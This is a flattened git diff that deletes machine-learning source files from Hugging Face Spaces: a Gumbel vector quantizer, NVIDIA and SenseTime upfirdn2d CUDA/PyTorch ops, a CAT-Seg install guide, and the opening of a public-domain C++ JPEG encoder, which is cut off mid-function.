block(self.input_dim if i == 0 else inner_dim, inner_dim) - for i in range(weight_proj_depth - 1) - ], - nn.Linear(inner_dim, groups * num_vars), - ) - else: - self.weight_proj = nn.Linear(self.input_dim, groups * num_vars) - nn.init.normal_(self.weight_proj.weight, mean=0, std=1) - nn.init.zeros_(self.weight_proj.bias) - - if isinstance(temp, str): - import ast - temp = ast.literal_eval(temp) - assert len(temp) == 3, f"{temp}, {len(temp)}" - - self.max_temp, self.min_temp, self.temp_decay = temp - self.curr_temp = self.max_temp - self.codebook_indices = None - - def set_num_updates(self, num_updates): - self.curr_temp = max( - self.max_temp * self.temp_decay ** num_updates, self.min_temp - ) - - def get_codebook_indices(self): - if self.codebook_indices is None: - from itertools import product - - p = [range(self.num_vars)] * self.groups - inds = list(product(*p)) - self.codebook_indices = torch.tensor( - inds, dtype=torch.long, device=self.vars.device - ).flatten() - - if not self.combine_groups: - self.codebook_indices = self.codebook_indices.view( - self.num_vars ** self.groups, -1 - ) - for b in range(1, self.groups): - self.codebook_indices[:, b] += self.num_vars * b - self.codebook_indices = self.codebook_indices.flatten() - return self.codebook_indices - - def codebook(self): - indices = self.get_codebook_indices() - return ( - self.vars.squeeze(0) - .index_select(0, indices) - .view(self.num_vars ** self.groups, -1) - ) - - def sample_from_codebook(self, b, n): - indices = self.get_codebook_indices() - indices = indices.view(-1, self.groups) - cb_size = indices.size(0) - assert ( - n < cb_size - ), f"sample size {n} is greater than size of codebook {cb_size}" - sample_idx = torch.randint(low=0, high=cb_size, size=(b * n,)) - indices = indices[sample_idx] - - z = self.vars.squeeze(0).index_select(0, indices.flatten()).view(b, n, -1) - return z - - def to_codebook_index(self, indices): - res = indices.new_full(indices.shape[:-1], 0) - for i in range(self.groups): - exponent = self.groups - i - 1 - res += indices[..., i] * (self.num_vars ** exponent) - return res - - def forward_idx(self, x): - res = self.forward(x, produce_targets=True) - return res["x"], res["targets"] - - def forward(self, x, produce_targets=False): - - result = {"num_vars": self.num_vars * self.groups} - - if not self.time_first: - x = x.transpose(1, 2) - - bsz, tsz, fsz = x.shape - x = x.reshape(-1, fsz) - x = self.weight_proj(x) - x = x.view(bsz * tsz * self.groups, -1) - - _, k = x.max(-1) - hard_x = ( - x.new_zeros(*x.shape) - .scatter_(-1, k.view(-1, 1), 1.0) - .view(bsz * tsz, self.groups, -1) - ) - hard_probs = torch.mean(hard_x.float(), dim=0) - result["code_perplexity"] = torch.exp( - -torch.sum(hard_probs * torch.log(hard_probs + 1e-7), dim=-1) - ).sum() - - avg_probs = torch.softmax( - x.view(bsz * tsz, self.groups, -1).float(), dim=-1 - ).mean(dim=0) - result["prob_perplexity"] = torch.exp( - -torch.sum(avg_probs * torch.log(avg_probs + 1e-7), dim=-1) - ).sum() - - result["temp"] = self.curr_temp - - if self.training: - x = F.gumbel_softmax(x.float(), tau=self.curr_temp, hard=True).type_as(x) - else: - x = hard_x - - x = x.view(bsz * tsz, -1) - - vars = self.vars - if self.combine_groups: - vars = vars.repeat(1, self.groups, 1) - - if produce_targets: - result["targets"] = ( - x.view(bsz * tsz * self.groups, -1) - .argmax(dim=-1) - .view(bsz, tsz, self.groups) - .detach() - ) - - x = x.unsqueeze(-1) * vars - x = x.view(bsz * tsz, self.groups, self.num_vars, -1) - x = x.sum(-2) - x = x.view(bsz, tsz, -1) - - if not self.time_first: - x = x.transpose(1, 2) # BTC -> BCT - - result["x"] = x - - return result diff --git a/spaces/gyugnsu/DragGan-Inversion/PTI/torch_utils/ops/upfirdn2d.cpp b/spaces/gyugnsu/DragGan-Inversion/PTI/torch_utils/ops/upfirdn2d.cpp deleted file mode 100644 index 2d7177fc60040751d20e9a8da0301fa3ab64968a..0000000000000000000000000000000000000000 --- a/spaces/gyugnsu/DragGan-Inversion/PTI/torch_utils/ops/upfirdn2d.cpp +++ /dev/null @@ -1,103 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#include -#include -#include -#include "upfirdn2d.h" - -//------------------------------------------------------------------------ - -static torch::Tensor upfirdn2d(torch::Tensor x, torch::Tensor f, int upx, int upy, int downx, int downy, int padx0, int padx1, int pady0, int pady1, bool flip, float gain) -{ - // Validate arguments. - TORCH_CHECK(x.is_cuda(), "x must reside on CUDA device"); - TORCH_CHECK(f.device() == x.device(), "f must reside on the same device as x"); - TORCH_CHECK(f.dtype() == torch::kFloat, "f must be float32"); - TORCH_CHECK(x.numel() <= INT_MAX, "x is too large"); - TORCH_CHECK(f.numel() <= INT_MAX, "f is too large"); - TORCH_CHECK(x.dim() == 4, "x must be rank 4"); - TORCH_CHECK(f.dim() == 2, "f must be rank 2"); - TORCH_CHECK(f.size(0) >= 1 && f.size(1) >= 1, "f must be at least 1x1"); - TORCH_CHECK(upx >= 1 && upy >= 1, "upsampling factor must be at least 1"); - TORCH_CHECK(downx >= 1 && downy >= 1, "downsampling factor must be at least 1"); - - // Create output tensor. - const at::cuda::OptionalCUDAGuard device_guard(device_of(x)); - int outW = ((int)x.size(3) * upx + padx0 + padx1 - (int)f.size(1) + downx) / downx; - int outH = ((int)x.size(2) * upy + pady0 + pady1 - (int)f.size(0) + downy) / downy; - TORCH_CHECK(outW >= 1 && outH >= 1, "output must be at least 1x1"); - torch::Tensor y = torch::empty({x.size(0), x.size(1), outH, outW}, x.options(), x.suggest_memory_format()); - TORCH_CHECK(y.numel() <= INT_MAX, "output is too large"); - - // Initialize CUDA kernel parameters. - upfirdn2d_kernel_params p; - p.x = x.data_ptr(); - p.f = f.data_ptr(); - p.y = y.data_ptr(); - p.up = make_int2(upx, upy); - p.down = make_int2(downx, downy); - p.pad0 = make_int2(padx0, pady0); - p.flip = (flip) ? 1 : 0; - p.gain = gain; - p.inSize = make_int4((int)x.size(3), (int)x.size(2), (int)x.size(1), (int)x.size(0)); - p.inStride = make_int4((int)x.stride(3), (int)x.stride(2), (int)x.stride(1), (int)x.stride(0)); - p.filterSize = make_int2((int)f.size(1), (int)f.size(0)); - p.filterStride = make_int2((int)f.stride(1), (int)f.stride(0)); - p.outSize = make_int4((int)y.size(3), (int)y.size(2), (int)y.size(1), (int)y.size(0)); - p.outStride = make_int4((int)y.stride(3), (int)y.stride(2), (int)y.stride(1), (int)y.stride(0)); - p.sizeMajor = (p.inStride.z == 1) ? p.inSize.w : p.inSize.w * p.inSize.z; - p.sizeMinor = (p.inStride.z == 1) ? p.inSize.z : 1; - - // Choose CUDA kernel. - upfirdn2d_kernel_spec spec; - AT_DISPATCH_FLOATING_TYPES_AND_HALF(x.scalar_type(), "upfirdn2d_cuda", [&] - { - spec = choose_upfirdn2d_kernel(p); - }); - - // Set looping options. - p.loopMajor = (p.sizeMajor - 1) / 16384 + 1; - p.loopMinor = spec.loopMinor; - p.loopX = spec.loopX; - p.launchMinor = (p.sizeMinor - 1) / p.loopMinor + 1; - p.launchMajor = (p.sizeMajor - 1) / p.loopMajor + 1; - - // Compute grid size. - dim3 blockSize, gridSize; - if (spec.tileOutW < 0) // large - { - blockSize = dim3(4, 32, 1); - gridSize = dim3( - ((p.outSize.y - 1) / blockSize.x + 1) * p.launchMinor, - (p.outSize.x - 1) / (blockSize.y * p.loopX) + 1, - p.launchMajor); - } - else // small - { - blockSize = dim3(256, 1, 1); - gridSize = dim3( - ((p.outSize.y - 1) / spec.tileOutH + 1) * p.launchMinor, - (p.outSize.x - 1) / (spec.tileOutW * p.loopX) + 1, - p.launchMajor); - } - - // Launch CUDA kernel. - void* args[] = {&p}; - AT_CUDA_CHECK(cudaLaunchKernel(spec.kernel, gridSize, blockSize, args, 0, at::cuda::getCurrentCUDAStream())); - return y; -} - -//------------------------------------------------------------------------ - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) -{ - m.def("upfirdn2d", &upfirdn2d); -} - -//------------------------------------------------------------------------ diff --git a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/torch_utils/op_edit/upfirdn2d.py b/spaces/gyugnsu/DragGan-Inversion/stylegan_human/torch_utils/op_edit/upfirdn2d.py deleted file mode 100644 index ecdcabbe20d2405b71d049d0bf94ae576fe58493..0000000000000000000000000000000000000000 --- a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/torch_utils/op_edit/upfirdn2d.py +++ /dev/null @@ -1,206 +0,0 @@ -# Copyright (c) SenseTime Research. All rights reserved. - -import os - -import torch -from torch.nn import functional as F -from torch.autograd import Function -from torch.utils.cpp_extension import load - - -module_path = os.path.dirname(__file__) -upfirdn2d_op = load( - "upfirdn2d", - sources=[ - os.path.join(module_path, "upfirdn2d.cpp"), - os.path.join(module_path, "upfirdn2d_kernel.cu"), - ], -) - - -class UpFirDn2dBackward(Function): - @staticmethod - def forward( - ctx, grad_output, kernel, grad_kernel, up, down, pad, g_pad, in_size, out_size - ): - - up_x, up_y = up - down_x, down_y = down - g_pad_x0, g_pad_x1, g_pad_y0, g_pad_y1 = g_pad - - grad_output = grad_output.reshape(-1, out_size[0], out_size[1], 1) - - grad_input = upfirdn2d_op.upfirdn2d( - grad_output, - grad_kernel, - down_x, - down_y, - up_x, - up_y, - g_pad_x0, - g_pad_x1, - g_pad_y0, - g_pad_y1, - ) - grad_input = grad_input.view( - in_size[0], in_size[1], in_size[2], in_size[3]) - - ctx.save_for_backward(kernel) - - pad_x0, pad_x1, pad_y0, pad_y1 = pad - - ctx.up_x = up_x - ctx.up_y = up_y - ctx.down_x = down_x - ctx.down_y = down_y - ctx.pad_x0 = pad_x0 - ctx.pad_x1 = pad_x1 - ctx.pad_y0 = pad_y0 - ctx.pad_y1 = pad_y1 - ctx.in_size = in_size - ctx.out_size = out_size - - return grad_input - - @staticmethod - def backward(ctx, gradgrad_input): - (kernel,) = ctx.saved_tensors - - gradgrad_input = gradgrad_input.reshape(-1, - ctx.in_size[2], ctx.in_size[3], 1) - - gradgrad_out = upfirdn2d_op.upfirdn2d( - gradgrad_input, - kernel, - ctx.up_x, - ctx.up_y, - ctx.down_x, - ctx.down_y, - ctx.pad_x0, - ctx.pad_x1, - ctx.pad_y0, - ctx.pad_y1, - ) - # gradgrad_out = gradgrad_out.view(ctx.in_size[0], ctx.out_size[0], ctx.out_size[1], ctx.in_size[3]) - gradgrad_out = gradgrad_out.view( - ctx.in_size[0], ctx.in_size[1], ctx.out_size[0], ctx.out_size[1] - ) - - return gradgrad_out, None, None, None, None, None, None, None, None - - -class UpFirDn2d(Function): - @staticmethod - def forward(ctx, input, kernel, up, down, pad): - up_x, up_y = up - down_x, down_y = down - pad_x0, pad_x1, pad_y0, pad_y1 = pad - - kernel_h, kernel_w = kernel.shape - batch, channel, in_h, in_w = input.shape - ctx.in_size = input.shape - - input = input.reshape(-1, in_h, in_w, 1) - - ctx.save_for_backward(kernel, torch.flip(kernel, [0, 1])) - - out_h = (in_h * up_y + pad_y0 + pad_y1 - kernel_h) // down_y + 1 - out_w = (in_w * up_x + pad_x0 + pad_x1 - kernel_w) // down_x + 1 - ctx.out_size = (out_h, out_w) - - ctx.up = (up_x, up_y) - ctx.down = (down_x, down_y) - ctx.pad = (pad_x0, pad_x1, pad_y0, pad_y1) - - g_pad_x0 = kernel_w - pad_x0 - 1 - g_pad_y0 = kernel_h - pad_y0 - 1 - g_pad_x1 = in_w * up_x - out_w * down_x + pad_x0 - up_x + 1 - g_pad_y1 = in_h * up_y - out_h * down_y + pad_y0 - up_y + 1 - - ctx.g_pad = (g_pad_x0, g_pad_x1, g_pad_y0, g_pad_y1) - - out = upfirdn2d_op.upfirdn2d( - input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1 - ) - # out = out.view(major, out_h, out_w, minor) - out = out.view(-1, channel, out_h, out_w) - - return out - - @staticmethod - def backward(ctx, grad_output): - kernel, grad_kernel = ctx.saved_tensors - - grad_input = UpFirDn2dBackward.apply( - grad_output, - kernel, - grad_kernel, - ctx.up, - ctx.down, - ctx.pad, - ctx.g_pad, - ctx.in_size, - ctx.out_size, - ) - - return grad_input, None, None, None, None - - -def upfirdn2d(input, kernel, up=1, down=1, pad=(0, 0)): - if input.device.type == "cpu": - out = upfirdn2d_native( - input, kernel, up, up, down, down, pad[0], pad[1], pad[0], pad[1] - ) - - else: - out = UpFirDn2d.apply( - input, kernel, (up, up), (down, - down), (pad[0], pad[1], pad[0], pad[1]) - ) - - return out - - -def upfirdn2d_native( - input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1 -): - _, channel, in_h, in_w = input.shape - input = input.reshape(-1, in_h, in_w, 1) - - _, in_h, in_w, minor = input.shape - kernel_h, kernel_w = kernel.shape - - out = input.view(-1, in_h, 1, in_w, 1, minor) - out = F.pad(out, [0, 0, 0, up_x - 1, 0, 0, 0, up_y - 1]) - out = out.view(-1, in_h * up_y, in_w * up_x, minor) - - out = F.pad( - out, [0, 0, max(pad_x0, 0), max(pad_x1, 0), - max(pad_y0, 0), max(pad_y1, 0)] - ) - out = out[ - :, - max(-pad_y0, 0): out.shape[1] - max(-pad_y1, 0), - max(-pad_x0, 0): out.shape[2] - max(-pad_x1, 0), - :, - ] - - out = out.permute(0, 3, 1, 2) - out = out.reshape( - [-1, 1, in_h * up_y + pad_y0 + pad_y1, in_w * up_x + pad_x0 + pad_x1] - ) - w = torch.flip(kernel, [0, 1]).view(1, 1, kernel_h, kernel_w) - out = F.conv2d(out, w) - out = out.reshape( - -1, - minor, - in_h * up_y + pad_y0 + pad_y1 - kernel_h + 1, - in_w * up_x + pad_x0 + pad_x1 - kernel_w + 1, - ) - out = out.permute(0, 2, 3, 1) - out = out[:, ::down_y, ::down_x, :] - - out_h = (in_h * up_y + pad_y0 + pad_y1 - kernel_h) // down_y + 1 - out_w = (in_w * up_x + pad_x0 + pad_x1 - kernel_w) // down_x + 1 - - return out.view(-1, channel, out_h, out_w) diff --git a/spaces/hamacojr/SAM-CAT-Seg/INSTALL.md b/spaces/hamacojr/SAM-CAT-Seg/INSTALL.md deleted file mode 100644 index 684c21171f6fc40b5febd995d45604643374c540..0000000000000000000000000000000000000000 --- a/spaces/hamacojr/SAM-CAT-Seg/INSTALL.md +++ /dev/null @@ -1,20 +0,0 @@ -## Installation - -### Requirements -- Linux or macOS with Python ≥ 3.6 -- PyTorch ≥ 1.7 and [torchvision](https://github.com/pytorch/vision/) that matches the PyTorch installation. - Install them together at [pytorch.org](https://pytorch.org) to make sure of this. Note, please check - PyTorch version matches that is required by Detectron2. -- Detectron2: follow [Detectron2 installation instructions](https://detectron2.readthedocs.io/tutorials/install.html). -- OpenCV is optional but needed by demo and visualization -- `pip install -r requirements.txt` - -An example of installation is shown below: - -``` -git clone https://github.com/~~~/CAT-Seg.git -cd CAT-Seg -conda create -n catseg python=3.8 -conda activate catseg -pip install -r requirements.txt -``` \ No newline at end of file diff --git a/spaces/hands012/gpt-academic/crazy_functions/test_project/cpp/libJPG/jpge.cpp b/spaces/hands012/gpt-academic/crazy_functions/test_project/cpp/libJPG/jpge.cpp deleted file mode 100644 index 2e26b71ed5aad0d46478fdbcd3a880be1401f946..0000000000000000000000000000000000000000 --- a/spaces/hands012/gpt-academic/crazy_functions/test_project/cpp/libJPG/jpge.cpp +++ /dev/null @@ -1,1049 +0,0 @@ -// jpge.cpp - C++ class for JPEG compression. -// Public domain, Rich Geldreich -// v1.01, Dec. 18, 2010 - Initial release -// v1.02, Apr. 6, 2011 - Removed 2x2 ordered dither in H2V1 chroma subsampling method load_block_16_8_8(). (The rounding factor was 2, when it should have been 1. Either way, it wasn't helping.) -// v1.03, Apr. 16, 2011 - Added support for optimized Huffman code tables, optimized dynamic memory allocation down to only 1 alloc. -// Also from Alex Evans: Added RGBA support, linear memory allocator (no longer needed in v1.03). -// v1.04, May. 19, 2012: Forgot to set m_pFile ptr to NULL in cfile_stream::close(). Thanks to Owen Kaluza for reporting this bug. -// Code tweaks to fix VS2008 static code analysis warnings (all looked harmless). -// Code review revealed method load_block_16_8_8() (used for the non-default H2V1 sampling mode to downsample chroma) somehow didn't get the rounding factor fix from v1.02. - -#include "jpge.h" - -#include -#include -#if PLATFORM_WINDOWS -#include -#endif - -#define JPGE_MAX(a,b) (((a)>(b))?(a):(b)) -#define JPGE_MIN(a,b) (((a)<(b))?(a):(b)) - -namespace jpge { - -static inline void *jpge_malloc(size_t nSize) { return FMemory::Malloc(nSize); } -static inline void jpge_free(void *p) { FMemory::Free(p);; } - -// Various JPEG enums and tables. -enum { M_SOF0 = 0xC0, M_DHT = 0xC4, M_SOI = 0xD8, M_EOI = 0xD9, M_SOS = 0xDA, M_DQT = 0xDB, M_APP0 = 0xE0 }; -enum { DC_LUM_CODES = 12, AC_LUM_CODES = 256, DC_CHROMA_CODES = 12, AC_CHROMA_CODES = 256, MAX_HUFF_SYMBOLS = 257, MAX_HUFF_CODESIZE = 32 }; - -static uint8 s_zag[64] = { 0,1,8,16,9,2,3,10,17,24,32,25,18,11,4,5,12,19,26,33,40,48,41,34,27,20,13,6,7,14,21,28,35,42,49,56,57,50,43,36,29,22,15,23,30,37,44,51,58,59,52,45,38,31,39,46,53,60,61,54,47,55,62,63 }; -static int16 s_std_lum_quant[64] = { 16,11,12,14,12,10,16,14,13,14,18,17,16,19,24,40,26,24,22,22,24,49,35,37,29,40,58,51,61,60,57,51,56,55,64,72,92,78,64,68,87,69,55,56,80,109,81,87,95,98,103,104,103,62,77,113,121,112,100,120,92,101,103,99 }; -static int16 s_std_croma_quant[64] = { 17,18,18,24,21,24,47,26,26,47,99,66,56,66,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99 }; -static uint8 s_dc_lum_bits[17] = { 0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0 }; -static uint8 s_dc_lum_val[DC_LUM_CODES] = { 0,1,2,3,4,5,6,7,8,9,10,11 }; -static uint8 s_ac_lum_bits[17] = { 0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d }; -static uint8 s_ac_lum_val[AC_LUM_CODES] = -{ - 0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12,0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07,0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08,0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0, - 0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16,0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28,0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49, - 0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89, - 0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5, - 0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, - 0xf9,0xfa -}; -static uint8 s_dc_chroma_bits[17] = { 0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0 }; -static uint8 s_dc_chroma_val[DC_CHROMA_CODES] = { 0,1,2,3,4,5,6,7,8,9,10,11 }; -static uint8 s_ac_chroma_bits[17] = { 0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77 }; -static uint8 s_ac_chroma_val[AC_CHROMA_CODES] = -{ - 0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21,0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71,0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91,0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0, - 0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34,0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26,0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38,0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48, - 0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87, - 0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3, - 0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, - 0xf9,0xfa -}; - -// Low-level helper functions. -template inline void clear_obj(T &obj) { memset(&obj, 0, sizeof(obj)); } - -const int YR = 19595, YG = 38470, YB = 7471, CB_R = -11059, CB_G = -21709, CB_B = 32768, CR_R = 32768, CR_G = -27439, CR_B = -5329; -static inline uint8 clamp(int i) { if (static_cast(i) > 255U) { if (i < 0) i = 0; else if (i > 255) i = 255; } return static_cast(i); } - -static void RGB_to_YCC(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst += 3, pSrc += 3, num_pixels--) - { - const int r = pSrc[0], g = pSrc[1], b = pSrc[2]; - pDst[0] = static_cast((r * YR + g * YG + b * YB + 32768) >> 16); - pDst[1] = clamp(128 + ((r * CB_R + g * CB_G + b * CB_B + 32768) >> 16)); - pDst[2] = clamp(128 + ((r * CR_R + g * CR_G + b * CR_B + 32768) >> 16)); - } -} - -static void RGB_to_Y(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst++, pSrc += 3, num_pixels--) - pDst[0] = static_cast((pSrc[0] * YR + pSrc[1] * YG + pSrc[2] * YB + 32768) >> 16); -} - -static void RGBA_to_YCC(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst += 3, pSrc += 4, num_pixels--) - { - const int r = pSrc[0], g = pSrc[1], b = pSrc[2]; - pDst[0] = static_cast((r * YR + g * YG + b * YB + 32768) >> 16); - pDst[1] = clamp(128 + ((r * CB_R + g * CB_G + b * CB_B + 32768) >> 16)); - pDst[2] = clamp(128 + ((r * CR_R + g * CR_G + b * CR_B + 32768) >> 16)); - } -} - -static void RGBA_to_Y(uint8* pDst, const uint8 *pSrc, int num_pixels) -{ - for ( ; num_pixels; pDst++, pSrc += 4, num_pixels--) - pDst[0] = static_cast((pSrc[0] * YR + pSrc[1] * YG + pSrc[2] * YB + 32768) >> 16); -} - -static void Y_to_YCC(uint8* pDst, const uint8* pSrc, int num_pixels) -{ - for( ; num_pixels; pDst += 3, pSrc++, num_pixels--) { pDst[0] = pSrc[0]; pDst[1] = 128; pDst[2] = 128; } -} - -// Forward DCT - DCT derived from jfdctint. -#define CONST_BITS 13 -#define ROW_BITS 2 -#define DCT_DESCALE(x, n) (((x) + (((int32)1) << ((n) - 1))) >> (n)) -#define DCT_MUL(var, c) (static_cast(var) * static_cast(c)) -#define DCT1D(s0, s1, s2, s3, s4, s5, s6, s7) \ - int32 t0 = s0 + s7, t7 = s0 - s7, t1 = s1 + s6, t6 = s1 - s6, t2 = s2 + s5, t5 = s2 - s5, t3 = s3 + s4, t4 = s3 - s4; \ - int32 t10 = t0 + t3, t13 = t0 - t3, t11 = t1 + t2, t12 = t1 - t2; \ - int32 u1 = DCT_MUL(t12 + t13, 4433); \ - s2 = u1 + DCT_MUL(t13, 6270); \ - s6 = u1 + DCT_MUL(t12, -15137); \ - u1 = t4 + t7; \ - int32 u2 = t5 + t6, u3 = t4 + t6, u4 = t5 + t7; \ - int32 z5 = DCT_MUL(u3 + u4, 9633); \ - t4 = DCT_MUL(t4, 2446); t5 = DCT_MUL(t5, 16819); \ - t6 = DCT_MUL(t6, 25172); t7 = DCT_MUL(t7, 12299); \ - u1 = DCT_MUL(u1, -7373); u2 = DCT_MUL(u2, -20995); \ - u3 = DCT_MUL(u3, -16069); u4 = DCT_MUL(u4, -3196); \ - u3 += z5; u4 += z5; \ - s0 = t10 + t11; s1 = t7 + u1 + u4; s3 = t6 + u2 + u3; s4 = t10 - t11; s5 = t5 + u2 + u4; s7 = t4 + u1 + u3; - -static void DCT2D(int32 *p) -{ - int32 c, *q = p; - for (c = 7; c >= 0; c--, q += 8) - { - int32 s0 = q[0], s1 = q[1], s2 = q[2], s3 = q[3], s4 = q[4], s5 = q[5], s6 = q[6], s7 = q[7]; - DCT1D(s0, s1, s2, s3, s4, s5, s6, s7); - q[0] = s0 << ROW_BITS; q[1] = DCT_DESCALE(s1, CONST_BITS-ROW_BITS); q[2] = DCT_DESCALE(s2, CONST_BITS-ROW_BITS); q[3] = DCT_DESCALE(s3, CONST_BITS-ROW_BITS); - q[4] = s4 << ROW_BITS; q[5] = DCT_DESCALE(s5, CONST_BITS-ROW_BITS); q[6] = DCT_DESCALE(s6, CONST_BITS-ROW_BITS); q[7] = DCT_DESCALE(s7, CONST_BITS-ROW_BITS); - } - for (q = p, c = 7; c >= 0; c--, q++) - { - int32 s0 = q[0*8], s1 = q[1*8], s2 = q[2*8], s3 = q[3*8], s4 = q[4*8], s5 = q[5*8], s6 = q[6*8], s7 = q[7*8]; - DCT1D(s0, s1, s2, s3, s4, s5, s6, s7); - q[0*8] = DCT_DESCALE(s0, ROW_BITS+3); q[1*8] = DCT_DESCALE(s1, CONST_BITS+ROW_BITS+3); q[2*8] = DCT_DESCALE(s2, CONST_BITS+ROW_BITS+3); q[3*8] = DCT_DESCALE(s3, CONST_BITS+ROW_BITS+3); - q[4*8] = DCT_DESCALE(s4, ROW_BITS+3); q[5*8] = DCT_DESCALE(s5, CONST_BITS+ROW_BITS+3); q[6*8] = DCT_DESCALE(s6, CONST_BITS+ROW_BITS+3); q[7*8] = DCT_DESCALE(s7, CONST_BITS+ROW_BITS+3); - } -} - -struct sym_freq { uint m_key, m_sym_index; }; - -// Radix sorts sym_freq[] array by 32-bit key m_key. Returns ptr to sorted values. -static inline sym_freq* radix_sort_syms(uint num_syms, sym_freq* pSyms0, sym_freq* pSyms1) -{ - const uint cMaxPasses = 4; - uint32 hist[256 * cMaxPasses]; clear_obj(hist); - for (uint i = 0; i < num_syms; i++) { uint freq = pSyms0[i].m_key; hist[freq & 0xFF]++; hist[256 + ((freq >> 8) & 0xFF)]++; hist[256*2 + ((freq >> 16) & 0xFF)]++; hist[256*3 + ((freq >> 24) & 0xFF)]++; } - sym_freq* pCur_syms = pSyms0, *pNew_syms = pSyms1; - uint total_passes = cMaxPasses; while ((total_passes > 1) && (num_syms == hist[(total_passes - 1) * 256])) total_passes--; - for (uint pass_shift = 0, pass = 0; pass < total_passes; pass++, pass_shift += 8) - { - const uint32* pHist = &hist[pass << 8]; - uint offsets[256], cur_ofs = 0; - for (uint i = 0; i < 256; i++) { offsets[i] = cur_ofs; cur_ofs += pHist[i]; } - for (uint i = 0; i < num_syms; i++) - pNew_syms[offsets[(pCur_syms[i].m_key >> pass_shift) & 0xFF]++] = pCur_syms[i]; - sym_freq* t = pCur_syms; pCur_syms = pNew_syms; pNew_syms = t; - } - return pCur_syms; -} - -// calculate_minimum_redundancy() originally written by: Alistair Moffat, alistair@cs.mu.oz.au, Jyrki Katajainen, jyrki@diku.dk, November 1996. -static void calculate_minimum_redundancy(sym_freq *A, int n) -{ - int root, leaf, next, avbl, used, dpth; - if (n==0) return; else if (n==1) { A[0].m_key = 1; return; } - A[0].m_key += A[1].m_key; root = 0; leaf = 2; - for (next=1; next < n-1; next++) - { - if (leaf>=n || A[root].m_key=n || (root=0; next--) A[next].m_key = A[A[next].m_key].m_key+1; - avbl = 1; used = dpth = 0; root = n-2; next = n-1; - while (avbl>0) - { - while (root>=0 && (int)A[root].m_key==dpth) { used++; root--; } - while (avbl>used) { A[next--].m_key = dpth; avbl--; } - avbl = 2*used; dpth++; used = 0; - } -} - -// Limits canonical Huffman code table's max code size to max_code_size. -static void huffman_enforce_max_code_size(int *pNum_codes, int code_list_len, int max_code_size) -{ - if (code_list_len <= 1) return; - - for (int i = max_code_size + 1; i <= MAX_HUFF_CODESIZE; i++) pNum_codes[max_code_size] += pNum_codes[i]; - - uint32 total = 0; - for (int i = max_code_size; i > 0; i--) - total += (((uint32)pNum_codes[i]) << (max_code_size - i)); - - while (total != (1UL << max_code_size)) - { - pNum_codes[max_code_size]--; - for (int i = max_code_size - 1; i > 0; i--) - { - if (pNum_codes[i]) { pNum_codes[i]--; pNum_codes[i + 1] += 2; break; } - } - total--; - } -} - -// Generates an optimized offman table. -void jpeg_encoder::optimize_huffman_table(int table_num, int table_len) -{ - sym_freq syms0[MAX_HUFF_SYMBOLS], syms1[MAX_HUFF_SYMBOLS]; - syms0[0].m_key = 1; syms0[0].m_sym_index = 0; // dummy 